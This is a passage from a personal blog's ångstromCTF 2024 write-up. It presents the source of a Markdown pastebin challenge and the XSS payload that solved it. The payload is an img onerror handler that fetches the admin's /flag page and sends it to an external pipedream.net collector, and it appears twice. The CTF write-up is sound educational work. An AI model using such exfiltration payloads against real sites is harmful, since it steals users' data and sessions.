function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mouseleave'</span><span class=\"token punctuation\">,</span> up<span class=\"token punctuation\">)</span></code></pre></div>\n<p>I obtained the flag by directly overwriting the value using the browser’s developer tools.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/485a71c56b0982c5a5f6cf5713a69118/0fb99/image-20240525234850364.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 26.666666666666668%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/485a71c56b0982c5a5f6cf5713a69118/8ac56/image-20240525234850364.webp 240w,\n/static/485a71c56b0982c5a5f6cf5713a69118/d3be9/image-20240525234850364.webp 480w,\n/static/485a71c56b0982c5a5f6cf5713a69118/e46b2/image-20240525234850364.webp 960w,\n/static/485a71c56b0982c5a5f6cf5713a69118/32b94/image-20240525234850364.webp 965w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/485a71c56b0982c5a5f6cf5713a69118/8ff5a/image-20240525234850364.png 
240w,\n/static/485a71c56b0982c5a5f6cf5713a69118/e85cb/image-20240525234850364.png 480w,\n/static/485a71c56b0982c5a5f6cf5713a69118/d9199/image-20240525234850364.png 960w,\n/static/485a71c56b0982c5a5f6cf5713a69118/0fb99/image-20240525234850364.png 965w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/485a71c56b0982c5a5f6cf5713a69118/d9199/image-20240525234850364.png\"\n            alt=\"image-20240525234850364\"\n            title=\"image-20240525234850364\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"markdownweb\" style=\"position:relative;\"><a href=\"#markdownweb\" aria-label=\"markdownweb permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>markdown(Web)</h2>\n<blockquote>\n<p>My friend made an app for sharing their notes!</p>\n</blockquote>\n<p>Accessing the challenge server launches a service that renders submitted Markdown as a web page.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 896px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/33a632822dbc653d60f72e90a0dc0127/4c42d/image-20240526003810635.png\"\n    style=\"display: block\"\n    
target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/33a632822dbc653d60f72e90a0dc0127/8ac56/image-20240526003810635.webp 240w,\n/static/33a632822dbc653d60f72e90a0dc0127/d3be9/image-20240526003810635.webp 480w,\n/static/33a632822dbc653d60f72e90a0dc0127/c1a89/image-20240526003810635.webp 896w\"\n              sizes=\"(max-width: 896px) 100vw, 896px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/33a632822dbc653d60f72e90a0dc0127/8ff5a/image-20240526003810635.png 240w,\n/static/33a632822dbc653d60f72e90a0dc0127/e85cb/image-20240526003810635.png 480w,\n/static/33a632822dbc653d60f72e90a0dc0127/4c42d/image-20240526003810635.png 896w\"\n            sizes=\"(max-width: 896px) 100vw, 896px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/33a632822dbc653d60f72e90a0dc0127/4c42d/image-20240526003810635.png\"\n            alt=\"image-20240526003810635\"\n            title=\"image-20240526003810635\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>There is also an admin access tool available.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; 
margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a853987be82290ac5786616c81a8290e/b1584/image-20240526003823917.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.166666666666664%; position: relative; bottom: 0; left: 0; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a853987be82290ac5786616c81a8290e/8ac56/image-20240526003823917.webp 240w,\n/static/a853987be82290ac5786616c81a8290e/d3be9/image-20240526003823917.webp 480w,\n/static/a853987be82290ac5786616c81a8290e/e46b2/image-20240526003823917.webp 960w,\n/static/a853987be82290ac5786616c81a8290e/ec5ae/image-20240526003823917.webp 1342w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a853987be82290ac5786616c81a8290e/8ff5a/image-20240526003823917.png 240w,\n/static/a853987be82290ac5786616c81a8290e/e85cb/image-20240526003823917.png 480w,\n/static/a853987be82290ac5786616c81a8290e/d9199/image-20240526003823917.png 960w,\n/static/a853987be82290ac5786616c81a8290e/b1584/image-20240526003823917.png 1342w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            
class=\"gatsby-resp-image-image\"\n            src=\"/static/a853987be82290ac5786616c81a8290e/d9199/image-20240526003823917.png\"\n            alt=\"image-20240526003823917\"\n            title=\"image-20240526003823917\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the application source code, we can see that the flag is stored in the admin’s cookie.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">const</span> crypto <span class=\"token operator\">=</span> <span class=\"token function\">require</span><span class=\"token punctuation\">(</span><span class=\"token string\">'crypto'</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">const</span> express <span class=\"token operator\">=</span> <span class=\"token function\">require</span><span class=\"token punctuation\">(</span><span class=\"token string\">'express'</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">const</span> app <span class=\"token operator\">=</span> <span class=\"token function\">express</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">const</span> posts <span class=\"token operator\">=</span> <span class=\"token keyword\">new</span> <span class=\"token class-name\">Map</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">use</span><span class=\"token punctuation\">(</span>express<span class=\"token punctuation\">.</span><span class=\"token function\">urlencoded</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span 
class=\"token literal-property property\">extended</span><span class=\"token operator\">:</span> <span class=\"token boolean\">false</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">_req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> placeholder <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n        <span class=\"token string\">'# Note title'</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'Content of the note. 
You can use *italics*!'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token function\">join</span><span class=\"token punctuation\">(</span><span class=\"token string\">'\\n'</span><span class=\"token punctuation\">)</span>\n\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/html'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">\n        &lt;link rel=\"stylesheet\" href=\"/style.css\">\n        &lt;div class=\"content\">\n            &lt;h1>Pastebin&lt;/h1>\n            &lt;form action=\"/create\" method=\"POST\">\n                &lt;textarea name=\"content\"></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>placeholder<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/textarea>\n                &lt;button type=\"submit\">Create&lt;/button>\n            &lt;/form>\n        &lt;/div>\n    </span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/flag'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span 
class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> cookie <span class=\"token operator\">=</span> req<span class=\"token punctuation\">.</span>headers<span class=\"token punctuation\">.</span>cookie <span class=\"token operator\">??</span> <span class=\"token string\">''</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/plain'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span>\n        cookie<span class=\"token punctuation\">.</span><span class=\"token function\">includes</span><span class=\"token punctuation\">(</span>process<span class=\"token punctuation\">.</span>env<span class=\"token punctuation\">.</span><span class=\"token constant\">TOKEN</span><span class=\"token punctuation\">)</span>\n        <span class=\"token operator\">?</span> process<span class=\"token punctuation\">.</span>env<span class=\"token punctuation\">.</span><span class=\"token constant\">FLAG</span>\n        <span class=\"token operator\">:</span> <span class=\"token string\">'no flag for you'</span>\n    <span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/view/:id'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">_req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> marked <span 
class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>\n        <span class=\"token string\">'https://cdnjs.cloudflare.com/ajax/libs/marked/4.2.2/marked.min.js'</span>\n    <span class=\"token punctuation\">)</span>\n\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/html'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">\n        &lt;link rel=\"stylesheet\" href=\"/style.css\">\n        &lt;div class=\"content\">\n        &lt;/div>\n        &lt;script src=\"</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>marked<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">\">&lt;/script>\n        &lt;script>\n            const content = document.querySelector('.content')\n            const id = document.location.pathname.split('/').pop()\n\n            delete (async () => {\n                const response = await fetch(\\`/content/\\${id}\\`)\n                const text = await response.text()\n                content.innerHTML = marked.parse(text)\n            })()\n        &lt;/script>\n    </span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">post</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/create'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token 
parameter\">req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> data <span class=\"token operator\">=</span> req<span class=\"token punctuation\">.</span>body<span class=\"token punctuation\">.</span>content <span class=\"token operator\">??</span> <span class=\"token string\">''</span>\n    <span class=\"token keyword\">const</span> id <span class=\"token operator\">=</span> crypto<span class=\"token punctuation\">.</span><span class=\"token function\">randomBytes</span><span class=\"token punctuation\">(</span><span class=\"token number\">8</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">toString</span><span class=\"token punctuation\">(</span><span class=\"token string\">'hex'</span><span class=\"token punctuation\">)</span>\n    posts<span class=\"token punctuation\">.</span><span class=\"token function\">set</span><span class=\"token punctuation\">(</span>id<span class=\"token punctuation\">,</span> data<span class=\"token punctuation\">)</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">redirect</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">/view/</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>id<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">'/content/:id'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> id <span class=\"token operator\">=</span> req<span class=\"token punctuation\">.</span>params<span class=\"token punctuation\">.</span>id\n    <span class=\"token keyword\">const</span> data <span class=\"token operator\">=</span> posts<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span>id<span class=\"token punctuation\">)</span> <span class=\"token operator\">??</span> <span class=\"token string\">''</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/plain'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/style.css'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">_req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">'text/css'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">\n        * {\n          font-family: system-ui, -apple-system, BlinkMacSystemFont,\n            'Segoe UI', Roboto, 'Helvetica Neue', sans-serif;\n          box-sizing: border-box;\n        }\n\n        html,\n        body {\n          margin: 0;\n        }\n\n        .content {\n          padding: 2rem;\n          width: 90%;\n          max-width: 900px;\n          margin: auto;\n        }\n\n        input:not([type='submit']) {\n          width: 100%;\n          padding: 8px;\n          margin: 8px 0;\n        }\n\n        textarea {\n          width: 100%;\n          padding: 8px;\n          margin: 8px 0;\n          resize: vertical;\n          font-family: monospace;\n        }\n\n        input[type='submit'] {\n          margin-bottom: 16px;\n        }\n\n\n    </span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">listen</span><span class=\"token punctuation\">(</span><span class=\"token number\">3000</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>The plan was to trigger XSS via the submitted Markdown.</p>\n<p>However, when scripts are injected via <code class=\"language-text\">innerHTML</code> after the page has loaded, browsers typically do not execute them directly.</p>\n<p>To work around this, I referenced the following article and used the <code class=\"language-text\">onerror</code> attribute on an <code class=\"language-text\">img</code> tag to run 
arbitrary JavaScript.</p>\n<p>Reference: <a href=\"https://qiita.com/koki-sato/items/86b02f72cb3d303caa78\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Creating CTF Challenges for In-Team CTF - XSS Edition #JavaScript - Qiita</a></p>\n<p>I retrieved the flag by submitting the following payload.</p>\n<div class=\"gatsby-highlight\" data-language=\"html\"><pre class=\"language-html\"><code class=\"language-html\"><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;</span>img</span> <span class=\"token attr-name\">src</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>x<span class=\"token punctuation\">\"</span></span> <span class=\"token special-attr\"><span class=\"token attr-name\">onerror</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">'</span><span class=\"token value javascript language-javascript\"><span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/flag\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span>e<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span><span class=\"token punctuation\">{</span>console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token 
punctuation\">(</span><span class=\"token string\">\"GET response HTML:\"</span><span class=\"token punctuation\">,</span>e<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span><span class=\"token keyword\">let</span> t<span class=\"token operator\">=</span><span class=\"token function\">encodeURIComponent</span><span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>n<span class=\"token operator\">=</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">https://eoxwstthee5l1zi.m.pipedream.net?query=</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>t<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">;</span><span class=\"token keyword\">return</span> <span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span>e<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span><span class=\"token punctuation\">{</span>console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span 
class=\"token punctuation\">(</span><span class=\"token string\">\"GET response from target URL:\"</span><span class=\"token punctuation\">,</span>e<span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></span><span class=\"token punctuation\">'</span></span></span><span class=\"token punctuation\">></span></span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;/</span>img</span><span class=\"token punctuation\">></span></span></code></pre></div>\n<p>This payload executes the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/flag\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">response</span> <span class=\"token operator\">=></span> response<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">htmlString</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"GET response HTML:\"</span><span class=\"token punctuation\">,</span> htmlString<span class=\"token punctuation\">)</span><span class=\"token 
punctuation\">;</span>\n        <span class=\"token keyword\">const</span> encodedHtmlString <span class=\"token operator\">=</span> <span class=\"token function\">encodeURIComponent</span><span class=\"token punctuation\">(</span>htmlString<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">const</span> targetUrl <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">https://eoxwstthee5l1zi.m.pipedream.net?query=</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>encodedHtmlString<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span>targetUrl<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">response</span> <span class=\"token operator\">=></span> response<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">result</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        console<span class=\"token punctuation\">.</span><span 
class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"GET response from target URL:\"</span><span class=\"token punctuation\">,</span> result<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Having the admin bot visit the page containing this exploit delivered the flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/21482/image-20240526003701192.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCklEQVQoz51Si06EMBDk///QaKJeDoFDoQ9K34y7KxoSvYTYZNhsl5nObttcXlvoNWIyC8bZ4DZpwThrzMZBOQ/TDbg+PKJ7ucAMN6h+EGiOXS/R3kYs4zsatyxIpSKkjEgIB3AeqbYQoX96xnxtYds36B1GYitxpYM8iTYhBPDato0/v8D76+JgtUaMCSkdcMhjjIghovHeC7fW+jeo6IyFVYocJ9krpdz9XwR5cbLtjhjfOZMDCVmapSWnnJd7h58TrNKqcyumWSHTiGrO4vyHc+CeFuR2tdIoNCup7XP/t0Me+motKgsSCvEqvYIj55xDip7azNRmpMvxHxP89IVAjhPdbM5F6oxPS/u/dACWjyoAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/8ac56/image-20240526003701192.webp 240w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/d3be9/image-20240526003701192.webp 480w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/e46b2/image-20240526003701192.webp 
960w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/e5c51/image-20240526003701192.webp 1350w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/8ff5a/image-20240526003701192.png 240w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/e85cb/image-20240526003701192.png 480w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/d9199/image-20240526003701192.png 960w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/21482/image-20240526003701192.png 1350w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/d9199/image-20240526003701192.png\"\n            alt=\"image-20240526003701192\"\n            title=\"image-20240526003701192\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I have started studying Pwn and Web, but I am still far from proficient — need to keep grinding.</p>\n<p>I solved an interesting Pwn challenge, which I plan to write up in a separate article 
later.</p>","fields":{"slug":"/ctf-angstrom-ctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/web-en/","/tag/english/"]},"frontmatter":{"date":"2024-05-28","description":"ångstromCTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","Web (en)","English"],"title":"ångstromCTF 2024 Writeup","socialImage":{"publicURL":"/static/5f4c0eaf07bfac9e87da15512e6e010e/ctf-angstrom-ctf-2024.png"}}}},"pageContext":{"slug":"/ctf-angstrom-ctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}